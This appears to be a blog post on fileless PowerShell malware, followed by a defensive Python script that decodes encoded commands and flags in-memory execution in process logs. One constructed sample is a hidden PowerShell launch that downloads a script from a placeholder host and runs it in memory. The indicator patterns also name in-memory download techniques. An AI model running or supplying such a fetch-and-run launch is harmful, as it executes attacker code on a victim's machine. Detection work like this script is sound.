Is it really fileless?
Over the past few weeks I have been seeing quite a few news articles about fileless malware infecting companies around the world. The article from Ars Technica specifically states that the goal of fileless malware is to reside in memory in order to remain nearly invisible. Besides residing in memory, the second aspect of fileless malware is the use of widely deployed tools that systems administrators rely on, such as PowerShell. I wrote back in 2015 about how attackers could be living off the LAN using similar techniques.
Why are attackers leveraging fileless malware?
Well, for one, not every endpoint solution inspects memory directly, which makes memory an ideal place to hide. Second, tools such as PowerShell are already deployed on the victim's systems, and that benefits the attacker in several ways: being able to live off the LAN removes the need to deploy their own malware to their victims, and with it much of the noise that doing so would create.
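As an added example (not code from the original post), this is the kind of check a defender can run over process-creation telemetry to catch the PowerShell side of this: it decodes -EncodedCommand arguments and flags launches whose script runs straight from memory instead of from a file on disk. The sample command lines are constructed, and the indicator list and field layout are assumptions.

```python
import base64
import re

# Patterns a defender looks for when a PowerShell launch suggests the script
# runs from memory rather than from a file on disk (assumed list, not exhaustive).
INDICATORS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "in-memory execution (IEX)": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "download straight into memory": re.compile(r"\.Download(?:String|Data)\(", re.I),
    "reflective assembly load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
}
# -e, -ec, -enc and -EncodedCommand all carry a base64 blob of UTF-16LE script text.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the plaintext behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline):
    """Decode any encoded payload and report which in-memory indicators it trips."""
    decoded = decode_encoded_command(cmdline)
    indicators = ["encoded command"] if decoded is not None else []
    # Search the switches plus the decoded script, with the base64 blob removed
    # so its letters cannot accidentally match an indicator.
    haystack = ENCODED_ARG.sub(" ", cmdline) + "\n" + (decoded or "")
    indicators += [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    return {"cmdline": cmdline, "decoded": decoded, "indicators": indicators}

def encode_for_powershell(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (used only to construct samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines as a process-creation log would record them; not real telemetry.
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage')"),
    "powershell.exe -File C:\\ops\\nightly-backup.ps1",
    "powershell.exe -Command Get-Service -Name Spooler",
]

def scan(cmdlines=SAMPLE_CMDLINES):
    """Return only the launches that tripped at least one indicator."""
    return [r for r in map(analyze, cmdlines) if r["indicators"]]
```

Of the three sample launches only the first is returned by scan(); the two legitimate administrative uses trip nothing, which is the point of decoding before matching rather than alerting on every powershell.exe start.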